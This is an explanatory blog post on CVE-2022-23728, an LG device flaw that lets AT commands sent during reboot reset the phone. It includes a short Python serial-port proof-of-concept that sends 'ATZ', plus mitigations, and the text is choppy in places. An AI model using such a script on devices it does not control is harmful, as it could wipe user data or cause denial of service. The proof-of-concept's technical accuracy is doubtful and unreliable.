CVE-2022-23728 - How Attackers Can Reset Devices with AT Commands During Reboot (LG LVE-SMP-210011)

In early 2022, security researchers discovered a critical vulnerability in certain LG smart mobile devices, tracked as CVE-2022-23728 and referenced as LVE-SMP-210011 by LG. This issue could allow an attacker to remotely reset the device during the reboot process using malicious AT commands. In this in-depth post, we'll break down the vulnerability, explain how it works in simple terms, show a proof-of-concept exploit, and point out the risks and mitigations.

What is an AT Command?

AT commands are instructions used to control modems. While mostly associated with older communication hardware, many modern devices (like LG smartphones) still support AT commands internally for tasks like troubleshooting, testing, or specific operations.

What is CVE-2022-23728?

CVE-2022-23728 is a software vulnerability in multiple LG device models. It allows an unauthorized user to send an AT command during the device's reboot process. Due to a security oversight, these commands aren't properly filtered or authenticated at this stage. As a result, a malicious actor with minimal access (for example, through a debugging interface or an open connection over USB) could reset the device — potentially triggering a factory reset, data wipe, or denial of service.

How Does It Work?

When an LG device starts up (boots up), it listens for AT commands coming from interfaces like USB or UART (a serial communication port). In a typical secure setup, the device would either block these commands or require privilege checks. But due to this bug, certain AT commands are *not* properly handled during the sensitive reboot window.

This means that, if an attacker has physical access or connected debugging access, they can issue a reset command when the device is rebooting.

Proof-of-Concept Code

Below is a *simple* demonstration using Python and PySerial library, showing how an attacker (with a USB-to-serial adapter or similar access) could issue an AT command to reset the device. This assumes the attacker can reach the device's serial interface during boot.

import serial
import time

# Replace with the appropriate serial port for the LG device
SERIAL_PORT = '/dev/ttyUSB'  # Example port, may vary by system
BAUD_RATE = 115200

# Standard AT command to reset (may vary for device)
AT_RESET_COMMAND = 'ATZ\r\n'

def send_at_command_during_reboot():
    # Connect to serial port
    try:
        with serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1) as ser:
            print("[*] Waiting for device to begin reboot...")
            time.sleep(5)  # Adjust timing to match reboot window

            print(f"[*] Sending reset AT command: {AT_RESET_COMMAND.strip()}")
            ser.write(AT_RESET_COMMAND.encode())

            # Optionally, read response
            response = ser.read(64)
            print("[*] Device responded:", response)
    except Exception as e:
        print("[!] Serial communication failed:", str(e))

if __name__ == '__main__':
    send_at_command_during_reboot()

The critical moment is during *reboot*. If the window is missed, command may fail or be ignored.

- The attacker needs only basic access (USB/debug/UART).

Attack Scenario

1. Attacker gains short-term access to device (USB debugging, maintenance port, or inside a supply chain).

The device may be factory reset, wiping all user data.

- Recurring resets could cause denial of service (device stuck in boot/reset loop).

References

- LG Security Advisory: LVE-SMP-210011
- CVE Listing: CVE-2022-23728 - NVD
- AT Command Set Reference: Wikipedia - AT Command

Update Firmware: Always install the latest updates from LG, which patch this vulnerability.

- Restrict Debug Ports: Disable unnecessary interfaces (UART, USB debugging) especially on production devices.

Conclusion

CVE-2022-23728 (LVE-SMP-210011) proves how even legacy features like AT command processing can become critical security holes if not carefully monitored during every stage of device operation. The attack described here is simple but effective, showing that attackers don't always need advanced exploits to cause real harm — sometimes all it takes is a forgotten command and the right timing. Stay updated, and lock down your hardware interfaces!

Stay Secure!

For more information, always check the official LG security bulletins and the National Vulnerability Database.

Timeline

Published on: 01/21/2022 19:15:00 UTC
Last modified on: 07/11/2022 17:39:00 UTC